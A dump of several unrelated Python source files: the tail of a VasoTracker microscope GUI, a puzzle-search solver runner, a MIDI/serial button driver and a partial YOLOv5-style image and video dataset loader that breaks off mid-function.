self.graphview.line2.set_xdata(xdata3[::-1][0::int(self.delta_i)][::-1])
self.graphview.line2.set_ydata(ydata2C[::-1][0::int(self.delta_i)][::-1])
# redraw just the points
self.graphview.ax1.draw_artist(self.graphview.line)
self.graphview.ax2.draw_artist(self.graphview.line2)
# fill in the axes rectangle
self.graphview.figure.canvas.blit(self.graphview.ax1.bbox)
self.graphview.figure.canvas.blit(self.graphview.ax2.bbox)
self.graphview.figure.canvas.draw_idle()
#self.graphview.figure.canvas.flush_events()
#self.graphview.figure.canvas.update()
#self.graphview.figure.canvas.flush_events()
#self.graphview.figure.canvas.get_tk_widget().update_idletasks()
#Example
def plot(self, timelist, outers, inners,xlims,ylims, xlims2, ylims2):
# Get the data
xdata = timelist # Time
ydata1 = outers # Outer diameter
ydata2 = inners # Inner diameter
xlims = xlims # Outer diameter
ylims = ylims # Outer Diameter
xlims2 = xlims2 # Inner diameter
ylims2 = ylims2 # Inner diameter
if len(xdata)>1:
self.on_running(xdata, ydata1,ydata2,xlims,ylims,xlims2,ylims2)
return
# Class for timing processes
class TimeIt():
from datetime import datetime
def __enter__(self):
self.tic = self.datetime.now()
def __exit__(self, *args, **kwargs):
print('runtime: {}'.format(self.datetime.now() - self.tic))
class TableFrame(tk.Frame):
def __init__(self,parent):
tk.Frame.__init__(self, parent, width=250, height = 300)#, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.mainWidgets()
def mainWidgets(self):
self.tableview = ttk.Frame(self)
self.tableview.grid(row=0, column=0, sticky=N+S+E+W)
try:
OutDiam = float(self.parent.processIncoming.OD)
InDiam = float(self.parent.processIncoming.ID)
except:
pass
P1 = '60'
P2 = '60'
def add_row():
try:
OutDiam = float(OD)
InDiam = float(ID)
initOutDiam, initInDiam = float(initOD), float(initID)
Label = table_text_entry.get()
Time = (time.time() - start_time)
Time = float(Time)
Time = round(Time, 1)
mxDiastring = StringVar()
max_diameter_text.set(str(initOutDiam))
max_diameter = initOutDiam
#max_diameter = max_diameter_text.set()
#max_diameter = int(max_diameter)
if max_diameter > 0:
max_diameter = float(max_diameter)
max_percent = ((float(OutDiam/max_diameter))*100)
max_percent = round(max_percent, 1)
table_1.insert('', 'end', values=(Time, Label, OutDiam, P1, P2, max_percent))
else:
max_percent = '-'
table_1.insert('', 'end', values=(Time, Label, OutDiam, P1, P2, max_percent))
hello = Label
save_table(hello)
table_1.yview_moveto(1)
except ValueError:
max_percent = '-'
table_1.insert('', 'end', values=(Time, Label, OutDiam, P1, P2, max_percent))
hello = ((Time, Label, OutDiam, P1, P2))
print hello
save_table(hello)
table_text_entry = StringVar()
max_diameter_text = StringVar()
def save_table(hello):
with open((self.parent.txt_file), 'ab') as g:
w=csv.writer(g, quoting=csv.QUOTE_ALL)
w.writerow(hello)
table_text_entry = StringVar()
max_diameter_text = StringVar()
table_2 = tk.Frame(self.tableview)
table_2.grid(row=0, column=0, columnspan=5, sticky=N+S+E+W)
table_label = ttk.Label(table_2, text = 'Label:')
table_label.grid(row=0, column=0)
table_entry = ttk.Entry(table_2, width=30, textvariable=table_text_entry )
table_entry.grid(row=0, column=1)
add_button = ttk.Button(table_2, text='Add', command=add_row)
add_button.grid(row=0, column=2)
max_diameter_label = ttk.Label(table_2, text='Initial Diameter:')
max_diameter_label.grid(row=0, column=3)
max_diameter_entry = ttk.Entry(table_2, width=5, textvariable=max_diameter_text )
max_diameter_entry.grid(row=0, column=4)
table_1 = ttk.Treeview(self.tableview, show= 'headings')
table_1["columns"] = ('Time', 'Label', 'Diameter', 'Pressure 1', 'Pressure 2', '% Initial')
table_1.column('#0', width=30)
table_1.column('Time', width=100, stretch=True)
table_1.column('Label', width=150)
table_1.column('Diameter', width=100)
table_1.column('Pressure 1', width=100)
table_1.column('Pressure 2', width=100)
table_1.column('% Initial', width=50)
table_1.heading('#1', text = 'Time')
table_1.heading('#2', text = 'Label')
table_1.heading('#3', text = 'Diameter')
table_1.heading('#4', text = 'Pressure 1')
table_1.heading('#5', text = 'Pressure 2')
table_1.heading('#6', text = '% Initial')
scrollbar = Scrollbar(self.tableview)
scrollbar.grid(row=1,column=2, sticky=NS)
scrollbar.config( command = table_1.yview )
table_1.grid(row=1, column=1, sticky=N+S+E+W)
class CameraFrame(tk.Frame):
def __init__(self,parent):
tk.Frame.__init__(self, parent, width=250, height = 300)#, highlightthickness=2, highlightbackground="#111")
self.parent = parent
self.mainWidgets()
def mainWidgets(self):
self.cameraview = tk.Label(self)
self.cameraview.grid(row=2,column=2,sticky=N+S+E+W, pady=ypadding)
def process_queue(self,params,img):
try:
img = img
imgc = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
timenow,OD1,OD2,ID1,ID2,OuterD,start = params
if self.parent.toolbar.record_flag:
# Draw the diameters:
for m,OD in enumerate(OD1):
pos = m*start+start
#Horizontal lines
imgc = cv2.line(imgc,(OD1[m],pos),(OD2[m],pos),(255,0,0),4) #in opencv rgb is bgr
imgc = cv2.line(imgc,(ID2[m],pos),(ID1[m],pos),(0,0,255),2) #in opencv rgb is bgr
#Vertical lines
imgc = cv2.line(imgc,(OD2[m],pos-5),(OD2[m],pos+5),(255,0,0),4) #in opencv rgb is bgr
imgc = cv2.line(imgc,(OD1[m],pos-5),(OD1[m],pos+5),(255,0,0),4) #in opencv rgb is bgr
imgc = cv2.line(imgc,(ID2[m],pos-5),(ID2[m],pos+5),(0,0,255),2) #in opencv rgb is bgr
imgc = cv2.line(imgc,(ID1[m],pos-5),(ID1[m],pos+5),(0,0,255),2) #in opencv rgb is bgr
cv2.putText(imgc, 't=%.2f seconds' %timenow,(20,30), cv2.FONT_HERSHEY_SIMPLEX, 0.5,(255,255,255),1,cv2.LINE_AA)
if self.parent.toolbar.record_is_checked.get() == 1 and self.parent.count%60 == 0:
timenow2 = int(timenow)
gfxPath = os.path.join(head, '%s_t=%ss_Result.tiff' % (os.path.splitext(tail)[0],timenow2))
cv2.imwrite(gfxPath,imgc)
imgc = cv2.cvtColor(imgc, cv2.COLOR_BGR2RGBA)
prevImg = Image.fromarray(imgc)
imgtk = ImageTk.PhotoImage(image=prevImg)
#Show the image
self.cameraview.configure(image=imgtk)
self.cameraview.image = imgtk #If you don't have this - it will flicker the image since it gets deleted during one
except:
pass
class Calculate_Diameter(object):
def __init__(self,image,multiplication_factor):
image = image
#print "working out the diameter"
def calc(self,image,multiplication_factor):
# Set up some parameters
ny,nx = image.shape
number,navg = 25,10
start = int(np.floor(ny/(number+1)))
end = number*start
thresh = 0
# The multiplication factor
scale = multiplication_factor
# Slice the image
data = [np.average(image[y-int(navg/2):y+int(navg/2),:], axis=0) for y in range(start,end+start,start)]
data2 = np.array(data)
#Smooth the datums
window = np.ones(11,'d')
smoothed = [np.convolve(window / window.sum(), sig, mode = 'same') for sig in data2]
#Differentiate the datums
ddts = [VTutils.diff(sig, 1) for sig in smoothed]
# Loop through each derivative
outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,ID = VTutils.process_ddts(ddts,thresh,nx,scale)
#Return the data
return(outer_diameters1,outer_diameters2,inner_diameters1,inner_diameters2,OD,ID,start)
class ThreadedClient:
"""
Launch the main part of the GUI and the worker thread. periodicCall and
endApplication could reside in the GUI part, but putting them here
means that you have all the thread controls in a single place.
"""
def __init__(self, master):
"""
Start the GUI and the asynchronous threads. We are in the main
(original) thread of the application, which will later be used by
the GUI as well. We spawn a new thread for the worker (I/O).
"""
#threading.Thread.daemon = True # Make sure the thread terminates on exit
self.master = master
# Create the queue
self.queue = Queue.Queue( )
# Set up the GUI part
self.gui = GuiPart(master, self.queue, self.endApplication)
# Set up the thread to do asynchronous I/O
# More threads can also be created and used, if necessary
self.running = 1
self.thread1 = threading.Thread(target=self.workerThread1)
#self.thread1.deamon = True
self.thread1.start( )
# Start the periodic call in the GUI to check if the queue contains
# anything
self.outers = []
self.inners = []
self.timelist = []
self.periodicCall( )
def periodicCall(self):
"""
Check every 10 ms if there is something new in the queue.
"""
if self.running:
self.gui.processIncoming( self.timelist, self.inners, self.outers )
if not self.running:
# This is the brutal stop of the system. You may want to do
# some cleanup before actually shutting it down.
import sys
sys.exit(1)
if self.running:
self.master.after(10, self.periodicCall)
def workerThread1(self):
"""
This is where we handle the asynchronous I/O. For example, it may be
a 'select( )'. One important thing to remember is that the thread has
to yield control pretty regularly, by select or otherwise.
"""
while self.running:
if(self.queue.empty()):
try: # Catch exception on closing the window!
# Check if there is an image in the buffer, or an image acuisition in progress
if (mmc.getRemainingImageCount() > 0 or mmc.isSequenceRunning()):
#Check if there is an image in the buffer
if mmc.getRemainingImageCount() > 0:
timenow = time.time() - start_time #Get the time
img = mmc.popNextImage() # Get the next image.
self.queue.put(img) # Put the image in the queue
except:
pass
def endApplication(self):
try:
mmc.stopSequenceAcquisition()
mmc.reset()
except:
pass
self.running = 0
#sys.exit()
root.quit()
root.destroy()
self.running = 0
if __name__ == "__main__":
global start_time
start_time=time.time()
# Set up the camera
mmc = MMCorePy.CMMCore()
# Create the main window
rand = random.Random( )
root = tk.Tk( )
root.iconbitmap('ICON.ICO')
root.attributes('-topmost',True)
root.after_idle(root.attributes,'-topmost',False)
root.wm_title("VasoTracker") #Makes the title that will appear in the top left
#Set the size and/or position
#root.wm_state('zoomed')
root.state("zoomed")
#root.resizable(0,0) # Remove ability to resize
#root.overrideredirect(True)
#top = Toplevel(root)
#root.overrideredirect(1) #hides max min buttons and the big x
# Go go go!
client = ThreadedClient(root)
root.mainloop( )
|
solver.py
|
import time
from copy import deepcopy
from multiprocessing import Process
import numpy as np
import libs.arg_parse_config as APC
import libs.astar as ASTAR
import libs.bfs as BFS
import libs.gfs as GFS
import libs.hc as HC
import libs.ids as IDS
import libs.puzzle as PUZZLE
import libs.state_node as STTREE
import libs.ucs as UCS
def execute(algName, algObject, output_path):
start = time.time()
print("\nExecuting %s..." % algName)
answerNode, exps, cost = algObject.execute()
print("\n%s completed." % algName)
end = time.time()
answerNode.printAnswerPath(algName, exps, cost, end - start, output_path)
args = APC.parser()
puzzle = PUZZLE.Puzzle(args.input_file)
answer = PUZZLE.AnswerPuzzle(puzzle.n)
astar = ASTAR.AStar(deepcopy(puzzle), deepcopy(answer))
astarProcess = Process(target=execute, args=("A* Search", astar, args.output_path))
if not args.a_star_only:
bfs = BFS.BreadthFirstSearch(deepcopy(puzzle), deepcopy(answer))
bfsProcess = Process(
target=execute, args=("Breadth-First Search", bfs, args.output_path)
)
ucs = UCS.UniformCostSearch(deepcopy(puzzle), deepcopy(answer))
ucsProcess = Process(
target=execute, args=("Uniform-Cost Search", ucs, args.output_path)
)
ids = IDS.IterativeDeepeningSearch(deepcopy(puzzle), deepcopy(answer))
idsProcess = Process(
target=execute, args=("Iterative Deepening Search", ids, args.output_path)
)
hc = HC.HillClimbing(deepcopy(puzzle), deepcopy(answer), args.k_hill_climbing)
hcProcess = Process(
target=execute,
args=("Hill Climbing with Lateral Movements Search", hc, args.output_path),
)
gfs = GFS.GreedyFirstSearch(deepcopy(puzzle), deepcopy(answer))
gfsProcess = Process(
target=execute, args=("Greedy Best-First Search", gfs, args.output_path)
)
# Starts processes
astarProcess.start()
if not args.a_star_only:
bfsProcess.start()
ucsProcess.start()
idsProcess.start()
hcProcess.start()
gfsProcess.start()
# Wait processes to join
astarProcess.join()
if not args.a_star_only:
bfsProcess.join()
ucsProcess.join()
idsProcess.join()
hcProcess.join()
gfsProcess.join()
|
rboxdriver.py
|
import threading, sys, midi_driver, threading, json, pyautogui
from main import resource_path
from time import sleep
from textwrap import wrap
from debug import printd
from ahk import AHK
#Class called from main
class RBoxTask:
def __init__(self, port:str, midiout:int, midiin:int):
self.__running = False
self.config = None
#call midi controller
self.midi = midi_driver.MidiController(midiout, midiin)
#call serial controller
self.pi = midi_driver.SerialController(port)
self.query = []
#get index of button determined by the midi config
def get_index(self, s:str):
for conf in self.config:
if(conf[1] == s):
return self.config.index(conf)
return None
#engine for handling button presses
def run_data_engine(self):
printd("START MAIN ENGINE")
while True:
if not self.__running: break #close process when __running is false
button = self.pi.read_button() #red button input from USB
if(button != None):
if(button < 16 and button >= 0):
printd(f"Motion trigger: Button ID {button}")#debug
s = f"{self.config[button][0]}{self.config[button][1]}{self.config[button][2]}"
payload = bytes.fromhex(s)
printd(f"generated payload: {payload.hex()}")#debug
self.midi.connection.write_short(payload[0], payload[1], payload[2]) #write to midi port
printd("STOP MAIN ENGINE")
#puts midi signals recieved into the query
#this process runs twice to ensure all data is captured
def run_rgb_engine(self):
printd("START RGB ENGINE")
while self.__running:
if(self.midi.input.poll()):
data = self.midi.input.read(1)
self.query.append(data)
#printd(data)#debug
#printd(type(data[0][0][0]))
printd("STOP RGB ENGINE")
#process that handles the query
def run_query_engine(self):
printd("START QUERY ENGINE")
while self.__running:
data = 0
if(len(self.query) > 0):
dataquery = self.query[0]
data = wrap(bytearray(dataquery[0][0]).hex(), 2)[:-1]
print(data)
if(data == 0):
continue
if(data[0] == "90"): #only NoteOn messages will be interpreted as RGB signals
index = self.get_index(data[1]) #get button index to send to launchpad
printd(f"GOT RGB SIGNAL: Button {data[1]}, pallette {data[2]}\nIndex >> {index}")#debug
if (index != None):
#relay message to launchpad
self.pi.send_rgb(index, int(data[2], 16))
if(len(self.query) > 0):
self.query.pop(0)
sleep(0.002) #sleep for 2ms
printd("STOP QUERY ENGINE")
#library used for multiprocessing purposes. The RBOX has two engines for handling input so it can recieve the signals more precise
#there is a bug where one process is failing, thats why I will be switching the engine to rust soon
def start(self, config):
self.__running = True
self.config = config
#start engine for handling button inputs
self.dataengine = threading.Thread(target=self.run_data_engine)
self.dataengine.daemon = True
self.dataengine.start ()
#start engines for handling input
self.rgbengine1 = threading.Thread(target=self.run_rgb_engine)
self.rgbengine1.daemon = True
self.rgbengine1.start ()
self.rgbengine = threading.Thread(target=self.run_rgb_engine)
self.rgbengine.daemon = True
self.rgbengine.start ()
#start engine for processing the query
self.queryengine = threading.Thread(target=self.run_query_engine)
self.queryengine.daemon = True
self.queryengine.start ()
def stop(self):
self.__running = False
self.dataengine .join()
self.rgbengine .join()
self.rgbengine1 .join()
self.queryengine.join()
class RBoxTilt:
def __init__(self, port:str):
self.ahk = AHK(executable_path=resource_path("AutoHotkeyU64.exe"))
self.pi = midi_driver.SerialController(port)
self.__running = False
with open("tiltconfig.json", "r") as file:
self.config = json.loads(file.read())
def run_tilt_engine(self):
printd("STARTING TILT ENGINE")
while True:
if not self.__running: break
button = self.pi.read_button()
if(button != None):
printd(f"MOTION TRIGGER: {button}")
try:
key = self.config[button]
if(len(key) == 1):
printd(f"\t>> SINGLE ACTION {key}")
self.ahk.key_press(key[0])
else:
pyautogui.hotkey(*key)
printd(f"\t>> DOUBLE ACTION {key}")
except:
pass
printd("STOPPING TILT ENGINE")
def start(self):
self.__running = True
self.tiltengine = threading.Thread(target=self.run_tilt_engine)
self.tiltengine.daemon = True
self.tiltengine.start ()
def stop(self):
self.__running = False
self.tiltengine .join()
|
datasets.py
|
import glob
# import cv2
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import torch_distributed_zero_first, xywh2xyxy, xyxy2xywh
help_url = "https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data"
img_formats = [".bmp", ".jpg", ".jpeg", ".png", ".tif", ".tiff", ".dng"]
vid_formats = [".mov", ".avi", ".mp4", ".mpg", ".mpeg", ".m4v", ".wmv", ".mkv"]
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == "Orientation":
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(
path,
imgsz,
batch_size,
stride,
opt,
hyp=None,
augment=False,
cache=False,
pad=0.0,
rect=False,
rank=-1,
world_size=1,
workers=8,
):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(
path,
imgsz,
batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank,
)
batch_size = min(batch_size, len(dataset))
nw = min(
[os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]
) # number of workers
sampler = (
torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
)
dataloader = InfiniteDataLoader(
dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn,
) # torch.utils.data.DataLoader()
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
"""Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, "batch_sampler", _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
"""Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if "*" in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, "*.*"))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception("ERROR: %s does not exist" % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = "images"
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, (
"No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s"
% (p, img_formats, vid_formats)
)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = "video"
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print(
"video %g/%g (%g/%g) %s: "
% (self.count + 1, self.nf, self.frame, self.nframes, path),
end="",
)
else:
# Read image
self.count += 1
# img0 = cv2.imread(path) # BGR
img0 = Image.open(path).convert("RGB")
assert img0 is not None, "Image Not Found " + path
print("image %g/%g %s: " % (self.count, self.nf, path), end="")
# Padded resize
img = np.array(letterbox(img0, new_shape=self.img_size)[0])
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, np.asarray(img0), self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == "0":
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord("q"): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, "Camera Error %s" % self.pipe
img_path = "webcam.jpg"
print("webcam %g: " % self.count, end="")
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources="streams.txt", img_size=640):
self.mode = "images"
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, "r") as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print("%g/%g: %s... " % (i + 1, n, s), end="")
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), "Failed to open %s" % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(" success (%gx%g at %.2f FPS)." % (w, h, fps))
thread.start()
print("") # newline
# check for common shapes
s = np.stack(
[letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0
) # inference shapes
self.rect = (
np.unique(s, axis=0).shape[0] == 1
) # rect inference if all shapes equal
if not self.rect:
print(
"WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams."
)
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord("q"): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(
self,
path,
img_size=640,
batch_size=16,
augment=False,
hyp=None,
rect=False,
image_weights=False,
cache_images=False,
single_cls=False,
stride=32,
pad=0.0,
rank=-1,
):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, "r") as t:
t = t.read().splitlines()
f += [
x.replace("./", parent) if x.startswith("./") else x
for x in t
] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + "*.*")
else:
raise Exception("%s does not exist" % p)
self.img_files = sorted(
[
x.replace("/", os.sep)
for x in f
if os.path.splitext(x)[-1].lower() in img_formats
]
)
except Exception as e:
raise Exception(
"Error loading data from %s: %s\nSee %s" % (path, e, help_url)
)
n = len(self.img_files)
assert n > 0, "No images found in %s. See %s" % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = (
self.augment and not self.rect
) # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
sa, sb = (
os.sep + "images" + os.sep,
os.sep + "labels" + os.sep,
) # /images/, /labels/ substrings
self.label_files = [
x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], ".txt")
for x in self.img_files
]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + ".cache" # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache["hash"] != get_hash(
self.label_files + self.img_files
): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = (
np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int)
* stride
)
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = (
0,
0,
0,
0,
0,
) # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, "> 5 label columns: %s" % file
assert (l >= 0).all(), "negative labels: %s" % file
assert (l[:, 1:] <= 1).all(), (
"non-normalized or out of bounds coordinate labels: %s" % file
)
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1e4:
if ns == 0:
create_folder(path="./datasubset")
os.makedirs("./datasubset/images")
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open("./datasubset/images.txt", "a") as f:
f.write(self.img_files[i] + "\n")
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = "%s%sclassifier%s%g_%g_%s" % (
p.parent.parent,
os.sep,
os.sep,
x[0],
j,
p.name,
)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(
b[[0, 2]], 0, w
) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(
f, img[b[1] : b[3], b[0] : b[2]]
), "Failure extracting classifier boxes"
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = (
"Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)"
% (cache_path, nf, nm, ne, nd, n)
)
if nf == 0:
s = "WARNING: No labels found in %s. See %s" % (
os.path.dirname(file) + os.sep,
help_url,
)
print(s)
assert not augment, "%s. Can not train without labels." % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc="Caching images")
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(
self, i
) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = "Caching images (%.1fGB)" % (gb / 1e9)
def cache_labels(self, path="labels.cache"):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(
zip(self.img_files, self.label_files),
desc="Scanning images",
total=len(self.img_files),
)
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), "image size <10 pixels"
if os.path.isfile(label):
with open(label, "r") as f:
